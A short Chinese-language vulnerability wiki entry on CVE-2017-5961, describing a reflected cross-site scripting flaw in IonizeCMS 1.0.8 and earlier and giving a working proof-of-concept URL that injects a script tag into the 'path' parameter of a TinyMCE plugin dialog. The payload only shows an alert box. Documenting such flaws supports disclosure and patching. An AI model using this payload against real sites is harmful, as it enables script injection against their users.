Loading
0

CVE-2017-5961 IonizeCMS XSS漏洞/zh-cn

pwnwiki.com

,

漏洞影响

<=Ionize 1.0.8

POC

http://<target>/testcmsofgithub/ionize-master/ionize-master/themes/admin/javascript/tinymce/jscripts/tiny_mce/plugins/codemirror/dialog.php?path=%22%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%20%22

免费、自由、人人可编辑的漏洞库